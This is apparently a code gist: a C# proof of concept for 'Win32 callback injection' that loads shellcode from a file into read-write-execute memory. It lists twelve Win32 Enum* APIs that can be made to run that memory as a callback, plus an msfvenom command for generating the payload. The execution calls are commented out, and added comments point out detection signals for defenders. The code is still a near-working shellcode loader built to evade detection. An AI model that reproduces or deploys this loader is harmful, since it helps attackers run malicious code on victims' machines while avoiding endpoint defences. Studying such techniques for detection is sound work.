
@v4nyl
Created November 24, 2021 18:38
Win32 Callback Injection - 12 Methods
using System;
using System.IO;
using System.Runtime.InteropServices;
//Resource: https[:]//vx-underground.org/papers.html -> Windows VX -> INJECTION -> Win32 Callback Injection (Author(s): Dreamer && Clover)
namespace Callback_Inject
{
// Proof-of-concept console program illustrating "callback execution": bytes read from a
// file are copied into executable memory, and that address is handed to a Win32 Enum*
// API in place of its callback function pointer. All twelve Enum* calls in Main are
// commented out, so as written Main only allocates memory and copies the file into it;
// enabling any one call makes the API invoke the copied bytes as a function.
// Defender view: the static shape of this file (a VirtualAlloc import next to Enum*
// imports whose callback parameter is typed IntPtr rather than a delegate) is a useful
// triage signal when reviewing an unknown .NET assembly.
class Program
{
// Entry point. The args parameter is not used.
public static void Main(string[] args)
{
// Reads the entire payload file into a managed byte array. The path is a placeholder.
byte[] shellcode = File.ReadAllBytes(@"C:\path\to\shellcode.txt"); // msfvenom -p windows/x64/exec CMD=calc exitfunc=thread -f raw -o shellcode.txt
// 0x1000 | 0x2000 is MEM_COMMIT | MEM_RESERVE and 0x40 is PAGE_EXECUTE_READWRITE, so the
// region is writable and executable at the same time. A private RWX region inside a
// managed process is uncommon in legitimate software and is a standard signal for memory
// scanners and EDR allocation telemetry.
// NOTE(review): the result is not compared with IntPtr.Zero before use, and the region is
// never released (no VirtualFree is declared in this file).
IntPtr hAlloc = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x1000 | 0x2000, 0x40);
// Copies the file contents from the managed array into the unmanaged region.
Marshal.Copy(shellcode,0,hAlloc,shellcode.Length);
// Each "Method N" below is an alternative way to reach the same outcome. In every variant
// hAlloc is passed where the API expects a callback function pointer, so the call into the
// copied bytes would originate from inside user32/kernel32 on the calling thread. The
// observable for detection is therefore a system DLL calling into memory that is not
// backed by a loaded image, rather than a thread-creation event.
//Method 1
//EnumChildWindows(IntPtr.Zero, hAlloc, IntPtr.Zero);
//Method 2
//EnumWindows(hAlloc, IntPtr.Zero);
//Method 3
//EnumDateFormatsEx(hAlloc, 0x0800, 0);
//Method 4
//EnumDesktops(GetProcessWindowStation(), hAlloc, IntPtr.Zero);
//Method 5
//EnumDesktopWindows(GetThreadDesktop(GetCurrentThreadId()), hAlloc, IntPtr.Zero);
//Method 6
//EnumSystemCodePagesA(hAlloc, 0);
//Method 7
//EnumSystemCodePagesW(hAlloc, 0);
//Method 8
//int GEOCLASS_NATION = 0x10;
//EnumSystemGeoID(GEOCLASS_NATION, 0, hAlloc);
//Method 9
//Int32 LGRPID_SUPPORTED = 0x00000002;
//EnumSystemLanguageGroupsA(hAlloc, LGRPID_SUPPORTED, IntPtr.Zero);
//Method 10
//EnumSystemLocalesA(hAlloc,0);
//Method 11
//EnumThreadWindows(0,hAlloc,IntPtr.Zero);
//Method 12
//EnumUILanguages(hAlloc, 0, IntPtr.Zero);
}
// kernel32!VirtualAlloc. Main passes the allocation type and protection as raw numeric constants.
// NOTE(review): the native dwSize parameter is SIZE_T (pointer-sized); it is declared as
// uint here, which does not match on 64-bit builds.
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
// Every Enum* declaration below types its callback parameter as IntPtr, so the marshaller
// passes the raw address through unchanged; a delegate-typed parameter would instead
// require a managed method as the callback.
// Some declarations carry [return: MarshalAs(UnmanagedType.Bool)] and others do not. The
// default P/Invoke marshalling of bool is already the 4-byte Win32 BOOL, so both forms
// marshal the return value the same way.
//Method 1
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool EnumChildWindows(IntPtr window, IntPtr callback, IntPtr i);
//Method 2
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool EnumWindows(IntPtr lpEnumFunc, IntPtr lParam);
//Method 3
[DllImport("kernel32.dll")]
static extern bool EnumDateFormatsEx(IntPtr lpDateFmtEnumProcEx,uint Locale, uint dwFlags);
//Method 4
// GetProcessWindowStation supplies the window-station handle that EnumDesktops takes as its first argument.
[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
public static extern IntPtr GetProcessWindowStation();
[DllImport("user32.dll")]
static extern bool EnumDesktops(IntPtr hwinsta, IntPtr lpEnumFunc, IntPtr lParam);
//Method 5
// GetCurrentThreadId and GetThreadDesktop are used only to obtain the desktop handle for EnumDesktopWindows.
[DllImport("user32.dll")]
static extern bool EnumDesktopWindows(IntPtr hDesktop, IntPtr lpfn, IntPtr lParam);
[DllImport("user32.dll", SetLastError = true)]
static extern IntPtr GetThreadDesktop(uint dwThreadId);
[DllImport("kernel32.dll")]
static extern uint GetCurrentThreadId();
//Method 6
[DllImport("kernel32.dll")]
static extern bool EnumSystemCodePagesA(IntPtr lpCodePageEnumProc, uint dwFlags);
//Method 7
[DllImport("kernel32.dll")]
static extern bool EnumSystemCodePagesW(IntPtr lpCodePageEnumProc, uint dwFlags);
//Method 8
[DllImport("kernel32.dll")]
public static extern bool EnumSystemGeoID(int geoClass, int parentGeoId, IntPtr callback);
//Method 9
[DllImport("kernel32.dll")]
public static extern bool EnumSystemLanguageGroupsA(IntPtr lpLanguageGroupEnumProc, int dwFlags, IntPtr lParam);
//Method 10
[DllImport("kernel32.dll")]
public static extern bool EnumSystemLocalesA(IntPtr lpLocaleEnumProc, uint dwFlags);
//Method 11
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
static extern bool EnumThreadWindows(uint dwThreadId, IntPtr lpfn, IntPtr lParam);
//Method 12
[DllImport("Kernel32.dll", CharSet = CharSet.Auto)]
static extern bool EnumUILanguages(IntPtr lpUILanguageEnumProc, UInt32 dwFlags, IntPtr lParam);
}
}